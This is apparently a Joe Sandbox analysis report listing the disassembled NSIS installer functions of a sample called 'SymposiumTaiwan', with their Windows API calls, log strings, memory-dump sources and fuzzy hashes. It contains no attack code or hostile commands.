Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

lstrcatW.KERNEL32(00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,NathanColeman,NathanColeman,00000000,00000000,NathanColeman,004D70B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042634C,762323A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042634C,762323A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Strings

File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: error, user cancel, xrefs: 00401B93
File: wrote %d to "%s", xrefs: 00401BD0
File: error, user abort, xrefs: 00401B53
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
NathanColeman, xrefs: 00401A53, 00401A5C, 00401A69, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: error, user retry, xrefs: 00401B40
File: error creating "%s", xrefs: 00401AF0

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$NathanColeman
API String ID: 4286501637-3261020129
Opcode ID: 64a9ea902cad21425178e5295187a554c2d9f068c1d21ee6613f60c398aeb4fb
Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
Opcode Fuzzy Hash: 64a9ea902cad21425178e5295187a554c2d9f068c1d21ee6613f60c398aeb4fb
Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004035C4
GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C

Strings

Error launching installer, xrefs: 00403603
soft, xrefs: 004036A1
Inst, xrefs: 00403698
Null, xrefs: 004036AA
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 175
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033F1
GetTickCount.KERNEL32 ref: 00403492
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
wsprintfW.USER32 ref: 004034CE
WriteFile.KERNELBASE(00000000,00000000,0042634C,00403792,00000000), ref: 004034FF
WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597

Strings

LcB, xrefs: 0040346F, 0040348A, 00403513
pAB, xrefs: 004033AB
... %d%%, xrefs: 004034C8
(]C, xrefs: 004033FD

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: (]C$... %d%%$LcB$pAB
API String ID: 651206458-1390502425
Opcode ID: cb4c91118d633cdc657fe6c8c56820a3b26f1ee58aa4180b17ceb2c9431ae53d
Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
Opcode Fuzzy Hash: cb4c91118d633cdc657fe6c8c56820a3b26f1ee58aa4180b17ceb2c9431ae53d
Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GlobalFree.KERNELBASE(00689C88), ref: 00402387

Strings

Pop: stack empty, xrefs: 00401F2C
Exch: stack < %d elements, xrefs: 00401ED8
NathanColeman, xrefs: 00401EFB, 00401F00, 00401F1A

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: Exch: stack < %d elements$NathanColeman$Pop: stack empty
API String ID: 1459762280-151249710
Opcode ID: e59d48cc0b33387c2730e4ad274f001f3a7594b7c65e82bccf9c8afdadd6d069
Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
Opcode Fuzzy Hash: e59d48cc0b33387c2730e4ad274f001f3a7594b7c65e82bccf9c8afdadd6d069
Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

GlobalFree.KERNELBASE(00689C88), ref: 00402387

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 62822491a2171e7313e749cd3bc434bc25a9f92e131eb6a230f292f9eb063890
Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
Opcode Fuzzy Hash: 62822491a2171e7313e749cd3bc434bc25a9f92e131eb6a230f292f9eb063890
Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 39b3758b80fcd953e19c2f81128d57e0ae640eda6b6d66c2b66b0c237e413b24
Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
Opcode Fuzzy Hash: 39b3758b80fcd953e19c2f81128d57e0ae640eda6b6d66c2b66b0c237e413b24
Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042634C,762323A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042634C,762323A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 15c68030ebc057a6bcbee2c0ec13fbcebe1f6febf3bc6cb13a7f0169c5a164a4
Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
Opcode Fuzzy Hash: 15c68030ebc057a6bcbee2c0ec13fbcebe1f6febf3bc6cb13a7f0169c5a164a4
Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405EC9
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4

Strings

nsa, xrefs: 00405EB8

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C

Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15

Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4

Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
